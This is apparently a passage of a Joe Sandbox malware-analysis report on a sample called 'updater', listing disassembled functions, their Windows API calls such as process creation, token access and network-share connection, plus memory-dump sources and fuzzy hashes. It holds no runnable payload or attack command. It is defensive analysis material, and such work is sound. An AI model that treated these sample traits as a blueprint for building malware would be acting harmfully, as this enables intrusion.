
GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C3E1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00C3E201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00C3E216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00C3E234

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: e0e44c0bbbeca370210a9aa30c3e9b7a2d8f040a73c7ddb53ae2226051e242cd
Instruction ID: 3f1de8856101cc6a4c185b3ff5405cf88122555f92d64f85b9e9766bff5cc156
Opcode Fuzzy Hash: e0e44c0bbbeca370210a9aa30c3e9b7a2d8f040a73c7ddb53ae2226051e242cd
Instruction Fuzzy Hash: 211161B52553149BE3308F51DD0CF97BBBCEB00B00F108559A716D6191D7B1E544DBA1

Function 00BE71E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00BE720B

Part of subcall function 00BE78F2: __fltout2.LIBCMT ref: 00BE791B

__cftog_l.LIBCMT ref: 00BE7231
__cftoe_l.LIBCMT ref: 00BE7263

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 9ced324360102b7d46510b7bc52437991d28010472b098e88a06dacafb09bacd
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 0201803208818EBBCF125E86CC418ED3FA2FF1A341B088595FA1858131CB36C9B1AB81

Function 00C3B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C3B956
ScreenToClient.USER32(?,?), ref: 00C3B96E
ScreenToClient.USER32(?,?), ref: 00C3B992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C3B9AD

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: b17465ed02b6114a821ee18d11437ec41127035d06bfedcaea3f40df0ff48512
Instruction ID: 44139cf8e800b58da002ca6a38c82389d374186bc8c9889575a66fe74839547b
Opcode Fuzzy Hash: b17465ed02b6114a821ee18d11437ec41127035d06bfedcaea3f40df0ff48512
Instruction Fuzzy Hash: 091174B9D00209EFDB41CF98C884AEEBBF9FF49310F104156E915E3210D731AA618F50

Function 017B4759 Relevance: 6.0, APIs: 4, Instructions: 43timefileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(?,?), ref: 017B476A
GetLastError.KERNEL32(?,?), ref: 017B4773
FileTimeToLocalFileTime.KERNEL32(?), ref: 017B4789
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 017B4798

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: FileTime$DateErrorFindLastLocalNext
String ID:
API String ID: 2103556486-0
Opcode ID: f218713af8d7f5f400ed25a2b579a45ca9935611dad86f3b5450e84def11e28b
Instruction ID: a05c60daa550a357677a95017cf0ce5c5104c2902b243b878adc79b736b3e742
Opcode Fuzzy Hash: f218713af8d7f5f400ed25a2b579a45ca9935611dad86f3b5450e84def11e28b
Instruction Fuzzy Hash: 5501FF725011059FCB45EEA8D8C9AC7B3ACAB5D25030445A2ED06CF24BE730E954C7F0

Function 00C3BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C3BCB6
_memset.LIBCMT ref: 00C3BCC5
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C78F20,00C78F64), ref: 00C3BCF4
CloseHandle.KERNEL32 ref: 00C3BD06

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 61cff9536f316048694a350172be3d2a1d1154ae477caf6388a412bd02332150
Instruction ID: f6e71f4410414f6b7eeb6674accf8278b49aca2e50243c9eb63bdc7a106d46e0
Opcode Fuzzy Hash: 61cff9536f316048694a350172be3d2a1d1154ae477caf6388a412bd02332150
Instruction Fuzzy Hash: 1CF05EF26803047FE7502BA1AC09FBF3A9DEB09760F008421FB0CD51A6EB714C5487A9

Function 00C17195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00C171A1

Part of subcall function 00C17C7F: _memset.LIBCMT ref: 00C17CB4

_memmove.LIBCMT ref: 00C171C4
_memset.LIBCMT ref: 00C171D1
LeaveCriticalSection.KERNEL32(?), ref: 00C171E1

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: a05abb940c707872fc8e68be1d77fe0afbb953b1dab1ed85eb1da7ff4de82cc3
Instruction ID: c6638a5100e26c81d7e1a9cf398c184f39aec5bc1adc3e59e4d7d56dcfdb40d3
Opcode Fuzzy Hash: a05abb940c707872fc8e68be1d77fe0afbb953b1dab1ed85eb1da7ff4de82cc3
Instruction Fuzzy Hash: 22F0303A100100ABCB016F55DC85B8ABB69EF46360F04C051FE085E22BC731A951EBB4

Function 00C3C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00BB16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB1729
Part of subcall function 00BB16CF: SelectObject.GDI32(?,00000000), ref: 00BB1738
Part of subcall function 00BB16CF: BeginPath.GDI32(?), ref: 00BB174F
Part of subcall function 00BB16CF: SelectObject.GDI32(?,00000000), ref: 00BB1778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C3C3E8
LineTo.GDI32(00000000,?,?), ref: 00C3C3F5
EndPath.GDI32(00000000), ref: 00C3C405
StrokePath.GDI32(00000000), ref: 00C3C413

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 2b70fcbfe2f66b954abb08064b6a7912cd35ae121a71c35e9507e3d24acd086c
Instruction ID: 6680c88f8f9f6cb41c0d5696162a3b2565c93cb84911a8d595eab791c4040ba2
Opcode Fuzzy Hash: 2b70fcbfe2f66b954abb08064b6a7912cd35ae121a71c35e9507e3d24acd086c
Instruction Fuzzy Hash: 73F0BE35045218BBDB222F54AC0DFDE3F59BF06310F148000FB11710E283B41650EBE9

Function 00C0AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C0AA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C0AA82
GetCurrentThreadId.KERNEL32 ref: 00C0AA89
AttachThreadInput.USER32(00000000), ref: 00C0AA90

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 47e71f939d4d7bb6c94a14e00a16f8e5841434bc041afd048545766168417e75
Instruction ID: f310ec49c2522e485d1ed95e00bf665896cc0d79f1a41099f0d775fca76b189c
Opcode Fuzzy Hash: 47e71f939d4d7bb6c94a14e00a16f8e5841434bc041afd048545766168417e75
Instruction Fuzzy Hash: 34E03931681328BADB215FA29D0CFEF3F1CFF127A1F108011FA0A85090C6718650DBA0

Function 00BB25F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00BB260D
SetTextColor.GDI32(?,000000FF), ref: 00BB2617
SetBkMode.GDI32(?,00000001), ref: 00BB262C
GetStockObject.GDI32(00000005), ref: 00BB2634
GetWindowDC.USER32(?,00000000), ref: 00BEC1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 00BEC1D1
GetPixel.GDI32(00000000,?,00000000), ref: 00BEC1EA
GetPixel.GDI32(00000000,00000000,?), ref: 00BEC203
GetPixel.GDI32(00000000,?,?), ref: 00BEC223
ReleaseDC.USER32(?,00000000), ref: 00BEC22E

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 9d28573d47b118728d52e4c4fafa466a0543e0f9eb84e99dcc4a250b9b034672
Instruction ID: a2189006ba896397af0a796c2dfcbd52cd292947974c116bd248f349097358b3
Opcode Fuzzy Hash: 9d28573d47b118728d52e4c4fafa466a0543e0f9eb84e99dcc4a250b9b034672
Instruction Fuzzy Hash: F3E06535544284BBDB215F64AC097DC3F61FB06331F1483AAFB69580E187714580DB12

Function 00C09330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00C09339
OpenThreadToken.ADVAPI32(00000000,?,?,?,00C08F04), ref: 00C09340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C08F04), ref: 00C0934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,00C08F04), ref: 00C09354

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: fca88d78bd524d28aedc4b08a2ba7ef21618bd8b4f74fb7edc543639c90db9f3
Instruction ID: a19ed279b69042bcaedd3d4970ac21c184b136331dfbbde6e8b6079be53578a6
Opcode Fuzzy Hash: fca88d78bd524d28aedc4b08a2ba7ef21618bd8b4f74fb7edc543639c90db9f3
Instruction Fuzzy Hash: B4E0863A6412119FD7201FF15D0DB5A3BACFF527B1F208818F745C90E0E6349444CB50

Function 00BF0679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00BF0679
GetDC.USER32(00000000), ref: 00BF0683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BF06A3
ReleaseDC.USER32(?), ref: 00BF06C4

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 4d6cb5181724ac679f9a2a6d5953850448488b0f657c4a6916087052b6294c3a
Instruction ID: 8776cfe6ff550ab951e15252899f5ba7d3ea1da5dd2de9a20d234463f27c6524
Opcode Fuzzy Hash: 4d6cb5181724ac679f9a2a6d5953850448488b0f657c4a6916087052b6294c3a
Instruction Fuzzy Hash: 2CE0E579840204EFCB01AF60D848BED7BF1FB88310F228459FE5AA7210CB7885519F50

Function 00BF068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00BF068D
GetDC.USER32(00000000), ref: 00BF0697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BF06A3
ReleaseDC.USER32(?), ref: 00BF06C4

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: adceecae9db952019ea67bf8db8f506acf1de385ba02a9cc1f7cca2da5f8cda8
Instruction ID: 9aa63d52709b4759067b07a9e2dc24d91ad236f7d25a905a66ddca3c02403be8
Opcode Fuzzy Hash: adceecae9db952019ea67bf8db8f506acf1de385ba02a9cc1f7cca2da5f8cda8
Instruction Fuzzy Hash: E7E01A79840204AFCB119F60D8087ED7BF1FF8C310F218418FE5AA7210CB7895518F50

Function 00C1B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC436A: _wcscpy.LIBCMT ref: 00BC438D

Part of subcall function 00BB4D37: __itow.LIBCMT ref: 00BB4D62
Part of subcall function 00BB4D37: __swprintf.LIBCMT ref: 00BB4DAC

__wcsnicmp.LIBCMT ref: 00C1B670
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C1B739

Strings

LPT, xrefs: 00C1B66A

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: b705c0949f463e519f2d9f4ffbb4f32cffb045a8ef4bfe5f9ec3c7d865aea2c1
Instruction ID: ce22ad13daecb8fd627c1cce6a3cb652e7332ee711f69b1d9424240e9d267f99
Opcode Fuzzy Hash: b705c0949f463e519f2d9f4ffbb4f32cffb045a8ef4bfe5f9ec3c7d865aea2c1
Instruction Fuzzy Hash: D7615E75A00219AFCB14DF94C891EEEB7F4EB49310F1080A9F556AB391D770AE81DFA0

Function 00BBE00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00BBE01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 00BBE037

Strings

@, xrefs: 00BBE02B

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: c23ad009047f85db8a52bce2c2507d27d6a0b6ba399e527dbc9fb128ead71cf1
Instruction ID: f100d6ad656c0f14b9bee24f3033e8bdd86b840f7fb9405642d45b3ef70b128c
Opcode Fuzzy Hash: c23ad009047f85db8a52bce2c2507d27d6a0b6ba399e527dbc9fb128ead71cf1
Instruction Fuzzy Hash: BE514A714087449BE320AF50E886BAFB7F8FF84715F51489DF2D8411A2DBB09969CB16

Function 00C38096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00C38186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C3819B

Strings

', xrefs: 00C380EF

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: e26017b45e305aed5de61366628d78618af9dbe1f437281446ce748d14531bde
Instruction ID: 0c7e3b157ca9970804388ac544ee4106ef7921ab952083227e756ed2193f2d6c
Opcode Fuzzy Hash: e26017b45e305aed5de61366628d78618af9dbe1f437281446ce748d14531bde
Instruction Fuzzy Hash: 7E411774A013099FDB14CF65C881BDE7BB5FB08340F10016AE918AB391DB70A946CF90

Function 00C22C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C22C6A
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C22CA0

Strings

|, xrefs: 00C22C71

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 8216770a4eeae522d67971810236aa187f6653723ae010b67cedc90ccd52ac5f
Instruction ID: af30338e24d4d8f59a7d49310073c48d9f6318c2c40d07c4ac7912cbcb063338
Opcode Fuzzy Hash: 8216770a4eeae522d67971810236aa187f6653723ae010b67cedc90ccd52ac5f
Instruction Fuzzy Hash: 85312871C00219ABCF01EFA5DC85EEEBFB9FF09304F104059F915A6262EB315A56DBA0

Function 00C37088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00C3713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C37178

Strings

static, xrefs: 00C370D8

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: b76dc316a404ab345d96f9210fbc1c95f415b1205d2c9c3b7ef05d96c3e27057
Instruction ID: 7b76e4b74ef60289a6b0f1d7977247f7350af72443c13bef52d333d888877101
Opcode Fuzzy Hash: b76dc316a404ab345d96f9210fbc1c95f415b1205d2c9c3b7ef05d96c3e27057
Instruction Fuzzy Hash: 8531AFB2110604AEDB249F78CC80BFB73B9FF48720F109619F9A987191DB70AD91DB60

Function 00C13049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C130B8
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C130F3

Strings

0, xrefs: 00C130B1

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: a84b040ee6f2e936aae9b2e2b7f93237fbbd4f6cef2245703405cd42d2727ae1
Instruction ID: 6b5cd0c819e87b6b030bc4439e35ad7205dda1571708af9c2af53ac53b145e09
Opcode Fuzzy Hash: a84b040ee6f2e936aae9b2e2b7f93237fbbd4f6cef2245703405cd42d2727ae1
Instruction Fuzzy Hash: F131F731600245FBEB249F58C885BEEBBF8FF06354F344059EDA6A6191E7709B84EB50

